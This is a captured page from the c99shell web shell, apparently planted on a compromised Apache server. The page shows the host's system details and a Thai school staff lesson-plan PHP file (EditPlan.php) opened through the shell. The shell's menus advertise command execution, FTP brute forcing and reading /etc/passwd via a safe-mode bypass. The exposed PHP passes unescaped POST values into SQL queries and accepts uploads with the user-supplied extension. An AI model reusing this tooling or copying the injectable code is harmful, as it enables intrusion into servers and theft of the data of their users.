!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     EditPlan.php (8.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    session_start
();
    
    
/**  Define Validate Access  */
    
define'_VALID_ACCESS' );

    
/**  Check Session User Login  */
    
if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo 
"<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo 
"<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        
/**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"../include/Function.php" );
        require_once( 
"../include/FunctionDB.php" );
    
        
/**  Create Database Object  */
        
$dbObj = new DBConn;

        
//=== SESSION
        
$Username $valid_user
        
        
        
/**  Config Table for This Page  */
        
$myTable1 "personal_tb";
        
        
/**  Table  -->  personal_tb  */
        
$query1 " SELECT *  FROM $myTable1  WHERE Username='$Username' ";
        
$result1 $dbObj->execQuery($query1);
        
$rss $dbObj->fetchArray($result1);
        
        
$Teacher_code $_POST['Teacher_code'];
        
$Status $_POST['Status'];
        
$programId $_POST['programId'];

        
$courseId $_POST['courseId'];
        
//$conditionId1 = $_POST['conditionId1'];
        //$conditionId2 = $_POST['conditionId2'];

        
$Method_code $_POST['Method_code'];
        
$Place =  trim$_POST['Place'] );
        
$Course_code $_POST['courseCode'];
        
$courseName $_POST['courseName'];
        
$courseUnit $_POST['courseUnit'];
        
$Start_date =  trim$_POST['Start_date'] );
        
$Total_std $_POST['Total_std'];
        
$Total_hour $_POST['Total_hour'];
        
$Total_std $_POST['Total_std'];
        
//$Start_date = $_POST['mYear']."-".$_POST['mMonth']."-".$_POST['mDate'];  // วัน/เดือน/ปีที่เริ่ม
        
$Start_date dmyE2ymdE2($_REQUEST["mDate"]);
        
$Mainidea htmlspecialcharstrim$_POST['Mainidea'] ) );  // แนวคิดหลัก
        
$Objective htmlspecialcharstrim$_POST['Objective'] ) );  // เรื่องที่สอน
        
$Title_name htmlspecialcharstrim$_POST['Title_name'] ) );    // เรื่องที่สอน
        
        
        /*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
        
$Media =  htmlspecialcharstrim$_POST['Media'] ) );    //??? อยู่ตรงไหน งง
        
$Appendix =  htmlspecialcharstrim$_POST['Appendix'] ) );  //??? อยู่ตรงไหน งง
        /*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
        
        
        
$Res_unit =  $_POST['Res_unit'];  // งานวิจัยในชั้นเรียน
        
$Apply =  $_POST['Apply'];  // นำผลงานวิจัยมาใช้ประโยชน์ ในงานวิจัยอื่น
        
        //---  วิธีการสอน
        
$M1 $_POST['M1'];         $M2 $_POST['M2'];         $M3 $_POST['M3'];         $M4 $_POST['M4'];         $M5 $_POST['M5'];
        
$M6 $_POST['M6'];         $M7 $_POST['M7'];         $M8 $_POST['M8'];         $M9 $_POST['M9'];         $M10 $_POST['M10'];
        
$M11 $_POST['M11'];         $M12 $_POST['M12'];         $M13 $_POST['M13'];         $M14 $_POST['M14'];
        
$M15 $_POST['M15'];         $M16 $_POST['M16'];         $M17 $_POST['M17'];         $M18 $_POST['M18'];
        
$M19 $_POST['M19'];         $M20 $_POST['M20'];         $M21 $_POST['M21'];         $M_else $_POST['M_else'];
        
$M_Else_desc trim$_POST['Else_desc'] );
    
        
//---  คุณลักษณะแผนการสอน
        
$Sp1 $_POST['Sp1'];         $Sp2 $_POST['Sp2'];         $Sp3 $_POST['Sp3'];         $Sp4 $_POST['Sp4'];         $Sp5 $_POST['Sp5'];
        
$Sp6 $_POST['Sp6'];         $Sp7 $_POST['Sp7'];         $Sp8 $_POST['Sp8'];         $Sp9 $_POST['Sp9'];         $Sp10 $_POST['Sp10'];
        
$Sp_Else_desc trim$_POST['Sp_Else_desc'] );

        
//---  วิธีการวัดและประเมินผล
        
$Asses1 $_POST['Asses1'];
        
$Asses2 $_POST['Asses2'];
        
$Asses3 $_POST['Asses3'];
        
$Asses4 $_POST['Asses4'];
        
        
$Path "../Plan_pic"
        
            
//###  Upload Image File
        
if( $_FILES['Filetex']['name'] != "" ) {

            
//ลบไฟล์เอกสารเดิม
            
$query1 "select Filetex from tech_plan_tb WHERE Plan_code='$Plan_code'";
            
$result1 mysql_query($query1);
            
$rs mysql_fetch_array($result1);            
            if(!empty(
$rs["Filetex"])) unlink($PlanPicPath.$rs["Filetex"]);
            
$dbObj->freeresult($result1);
            
            
//Upload ไฟล์เอกสารใหม่
            //$Filetex = $_FILES['Filetex']['name'];
            
$Filetex date('YmdHis').strrchr($_FILES['Filetex']['name'], ".");
            @
copy$_FILES['Filetex']['tmp_name'] , $PlanPicPath.$Filetex );
            @
unlink$_FILES['Filetex']['tmp_name'] );
        
        
//---  Insert to DB
        //---  Table  -->  'tech_plan_tb'
        
if( $courseId != "" ) { 
            
$strSQL " UPDATE tech_plan_tb  SET  acadYear='$acadYear', semester='$semester', programId='$programId' , courseCode='$courseCode' , conditionId1='$conditionId1' , conditionId2='$conditionId2' , Method_code='$Method_code' , Status='$Status' , courseId='$courseId' , Start_date='$Start_date' , Objective='$Objective' , Mainidea='$Mainidea' , Title_name ='$Title_name' , Total_hour='$Total_hour' , Total_std='$Total_std' , Assess_code='$Assess_code' , Place='$Place' , Media='$Media' , Appendix='$Appendix' , Res_unit='$Res_unit' , Apply='$Apply' , Asses1='$Asses1' ,  Asses2='$Asses2' , Asses3='$Asses3' , Asses4='$Asses4' ,Filetex='$Filetex', date_updated=NOW()   WHERE Plan_code='$Plan_code' "
        }
        } else {
            
$strSQL " UPDATE tech_plan_tb  SET  acadYear='$acadYear', semester='$semester' , programId='$programId' , courseCode='$courseCode' , conditionId1='$conditionId1' , conditionId2='$conditionId2' , Method_code='$Method_code' , Status='$Status' , courseId='$courseId' , Start_date='$Start_date' , Objective='$Objective' , Mainidea='$Mainidea' , Title_name ='$Title_name' , Total_hour='$Total_hour' , Total_std='$Total_std' , Assess_code='$Assess_code' , Place='$Place' , Media='$Media' , Appendix='$Appendix' , Res_unit='$Res_unit' , Apply='$Apply' , Asses1='$Asses1' ,  Asses2='$Asses2' , Asses3='$Asses3' , Asses4='$Asses4' , date_updated=NOW()   WHERE Plan_code='$Plan_code' ";
        }
        
$result  $dbObj->runQuery($strSQL);
        
$dbObj->freeresult($result);
     
         
//---  Table  -->  'tech_spec_tb'
        
$strSQL1 " UPDATE tech_spec_tb  SET Sp1='$Sp1' , Sp2='$Sp2' , Sp3='$Sp3' , Sp4='$Sp4' , Sp5='$Sp5' , Sp6='$Sp6' , Sp7='$Sp7' , Sp8='$Sp8' , Sp9='$Sp9' , Sp10='$Sp10' , Sp11='$Sp11' , Else_desc='$Sp_Else_desc' , date_updated=NOW()  
                WHERE Plan_code='$Plan_code' "
;
        
$result1  $dbObj->runQuery($strSQL1);
        
$dbObj->freeresult($result1);
        
        
//---  Table  -->  'techplan_method_tb'
        
$strSQL2 " UPDATE techplan_method_tb  SET M1='$M1' , M2='$M2' , M3='$M3' , M4='$M4' , M5='$M5' , M6='$M6' , M7='$M7' , M8='$M8' , M9='$M9' , M10='$M10' , M11='$M11' , M12='$M12' , M13='$M13' , M14='$M14' , M15='$M15' , M16='$M16' , M17='$M17' , M18='$M18' , M19='$M19' , M20='$M20' , M_else='$M_else' , Else_desc='$M_Else_desc' , date_updated=NOW()  
                WHERE Plan_code='$Plan_code' "
;
        
$result2  $dbObj->runQuery($strSQL2);
        
$dbObj->freeresult($result2);

    
    } 
# else
 
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>
<title>ข้อมูลทั่วไปบุคลากร - ข้อมูลแผนการสอน - แก้ไขข้อมูลแผนการสอน</title>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
    
include("../templates/incHeader.php");
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td>
    <td width="800" height="440" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset>
     <table width="780" border="0" cellspacing="0" cellpadding="0">
      <form id="myForm" name="myForm" method="post" action="">
      <tr>
        <td height="5"></td>
      </tr>
      <tr>
        <td height="30" background="../images/background/bg-head-topic-w780.gif" class="PADDING-LEFT-10"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>&raquo; <a href="Menu_Teach.php">ข้อมูลทั่วไปบุคลากร</a> &raquo; <a href="PlanList.php?Teacher_code=<?=$Teacher_code;?>">ข้อมูลแผนการสอน</a> &raquo; <span class="NOTE">เพิ่มข้อมูลแผนการสอน</span></strong></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td height="150" align="center"><span class="TEXT-GREEN10"><strong>ระบบจัดเก็บข้อมูลของท่านเรียบร้อยแล้ว</strong></span><br />
          กรุณารอส้กครู่ กำลังเปลี่ยนหน้าอัตโนมัติ<br />
          <?php echo "<meta http-equiv=\"refresh\" content=\"0; URL=PlanList.php?Teacher_code=$Teacher_code\">"?></td>
      </tr>
      <tr>
        <td height="345">&nbsp;</td>
      </tr></form>
    </table>
   </fieldset></td>
  </tr>
</table>
<?php include("../templates/incFooter.php"); ?>
</body>
</html>
<?php
    
/**  Free Resource */
    
$dbObj->freeresult($result1);
    
    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0145 ]--